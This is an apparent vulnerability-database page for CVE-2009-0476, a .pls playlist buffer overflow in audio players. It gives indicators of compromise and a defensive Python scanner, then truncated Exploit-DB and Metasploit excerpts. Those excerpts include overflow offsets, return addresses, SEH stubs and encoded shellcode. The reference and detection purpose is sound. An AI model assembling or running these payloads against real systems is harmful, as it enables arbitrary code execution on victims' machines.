CVE-2009-0476
Published 2009-02-08
Priority P3 · 57 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 37.04% (98.3rd percentile)
Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET, allows remote attackers to execute arbitrary code via a long string in a playlist (.pls) file, as originally reported for Euphonics Audio Player 1.0. NOTE: some of these details are obtained from third party information.
Detection & IOCs (extracted from sources)
bytes: \x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D (decodes to the .pls header "[playlist]\r\nFile1=")
- Overflow trigger offset is 1308 bytes before the SEH overwrite in Audiotran 1.4.1; monitor for .pls files with anomalously long strings exceeding this length.
- Overflow trigger offset is 1940 bytes before the nSEH/SEH overwrite in MP3 Workstation 9.2.1.1.2; .pls files with padding of this length are malicious.
- Overflow trigger offset is 1324 bytes in Euphonics Audio Player 1.0; .pls files with a string of this length followed by a return address are exploit indicators.
- SEH-based exploitation uses the short-jump opcode sequence \xeb\x06\x90\x90 as the nSEH value; detect this 4-byte sequence at offset 1940 within a .pls file.
- Bad characters for payload construction are the null byte, newline, and equals sign (\x00\x0a\x3d); shellcode in malicious .pls files will avoid these bytes.
- The vulnerable DLL rsaadjd.tmp is used as a pop/pop/ret (p/p/r) gadget source in Audiotran exploits; presence of this file alongside Audiotran is a risk indicator.
- The Metasploit module targets Audiotran 1.4.1 with a Windows Universal target using a single hardcoded return address; a separate module exists for Audiotran 1.4.2.4, indicating the offset/ret may differ between minor versions.
- The vulnerability resides in AdjMmsEng.dll versions 7.11.1.0 and 7.11.2.7, distributed across multiple MultiMedia Soft audio components; detection should cover all applications bundling this DLL, not just Audiotran or Euphonics.
- Remote exploitation via browser is theoretically possible if the .pls extension is registered to the vulnerable application, but this vector was not tested in the Metasploit module.
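As an added example (not part of this record or of any listed exploit), a defender-side scanner that applies the indicators above to a playlist body: the 1308-byte threshold and the nSEH stub bytes come from the bullets, and the two sample playlists are constructed.

```python
# Added example: flag .pls playlists that match the CVE-2009-0476 indicators.
# Not taken from the record or the listed exploits; thresholds are the page's offsets.
import re

# Smallest overflow offset reported on this page (Audiotran 1.4.1: 1308 bytes).
# No legitimate media path or URL in a File entry comes close to this length.
MIN_TRIGGER_OFFSET = 1308
# nSEH value used by the SEH-style exploits: short jmp +6 followed by two NOPs.
NSEH_SHORT_JMP = b"\xeb\x06\x90\x90"
FILE_ENTRY = re.compile(rb"^(File\d+)=(.*)$", re.MULTILINE)


def scan_pls(data: bytes) -> list:
    """Return (entry_name, reason) findings for one .pls file body; [] when clean."""
    findings = []
    if not data.lstrip().startswith(b"[playlist]"):
        return findings  # not a PLS playlist at all; nothing to assess
    for m in FILE_ENTRY.finditer(data):
        name, value = m.group(1).decode(), m.group(2).rstrip(b"\r")
        if len(value) >= MIN_TRIGGER_OFFSET:
            findings.append((name, f"value length {len(value)} >= {MIN_TRIGGER_OFFSET}"))
        if NSEH_SHORT_JMP in value:
            findings.append((name, f"SEH short-jump stub at offset {value.index(NSEH_SHORT_JMP)}"))
        # A long run of one repeated byte is overflow padding, never a real path.
        run = re.search(rb"(.)\1{255,}", value, re.DOTALL)
        if run:
            findings.append((name, f"{len(run.group(0))}-byte run of {run.group(1)!r}"))
    return findings


# Constructed samples: a benign playlist and one shaped like the MP3 Workstation
# indicator (1940 bytes of padding, then the nSEH stub, then a short NOP slide).
BENIGN_PLS = b"[playlist]\r\nFile1=C:\\Music\\track01.mp3\r\nTitle1=Track 1\r\nNumberOfEntries=1\r\n"
SUSPECT_PLS = b"[playlist]\r\nFile1=" + b"A" * 1940 + NSEH_SHORT_JMP + b"\x90" * 12 + b"\r\n"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_PLS), ("suspect", SUSPECT_PLS)):
        print(label, scan_pls(body) or "clean")
```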
No detection rules found.
Exploit-DB · 2010-09-15 · MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)
---
#MP3 Workstation Version 9.2.1.1.2 SEH exploit
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://www.e-soft.co.uk/MP3%20Workstation.htm
#Vulnerable version MP3 Workstation Version 9.2.1.1.2
#Tested on XP SP2
#Greets Puneet Jain
my $head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D";
my $fuck = "\x41" x 1940;
my $nseh = "\xeb\x06\x90\x90"; # short jump
my $seh = pack('V',0x735275CB); #0x735275CB msvbvm60.dll p/p/r
my $slide = "\x90" x 12;
my $code =
"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA".
"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60".
"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A".
"\x25\xCF\xB4\x4E\xBE\xBD\x1
Exploit-DB · 2010-01-28 · Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audi
Exploit-DB · 2010-01-10 · Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
---
#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date : January 9th, 2010
# Author : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version : 1.4.1
# OS : Windows
# Tested on : XP SP2/SP3 En (VMware)
# Type of vuln : Stack Overflow / SEH
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
banner =
"|------------------------------------------------------------------|\n" +
"| __ __ |\n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"|
Exploit-DB · 2009-09-24 · Audio Workstation - '.pls' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
=gnk
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)
[�] Exploited by:.......[ germaya_x ].....................
[�] Script:.............[ Audio Workstation ].....................
[�] version:............[ 6.4.2.4.0 ]
[�] Today:..............[ 24/09/2009 ].....................
[�] platform............[ Windows ].....................
[�] tested on:..........[ Windows XP SP2 ].....................
[�] greetz:.............[ his0k4/D3v!LFUCK3R ].....................
=cut
##############################################################################
my
Exploit-DB · 2009-02-04 · Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : Houssamix
# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
# Gr33tz to : str0ke , real-power.net , Legend-spy - stack
# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
# just the ret adress is changed for make the exploit universal
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll >$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-02-04]
Exploit-DB · 2009-02-04 · Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
---
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define overflow 1324
#define NOP 0x90
#define pls "Eye.pls"
int main (int argc,char **argv)
{
char winsp3[] = "\x7B\x46\x86\x7C";
char buffer[overflow];
FILE *Player;
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
"\x9c\x8a\xd0\x39\x84\x9e
Exploit-DB · 2009-02-03 · Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\
Metasploit · Audiotran PLS File Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to the victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.
Metasploit · Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to the victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module.
Metasploit · Audio Workstation 6.4.2.4.3 pls Buffer Overflow
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
References
http://secunia.com/advisories/33791
http://secunia.com/advisories/33817
http://www.securityfocus.com/archive/1/500652/100/0/threaded
http://www.securityfocus.com/bid/33589
http://www.vupen.com/english/advisories/2009/0316
https://www.exploit-db.com/exploits/7958
https://www.exploit-db.com/exploits/7973
https://www.exploit-db.com/exploits/7974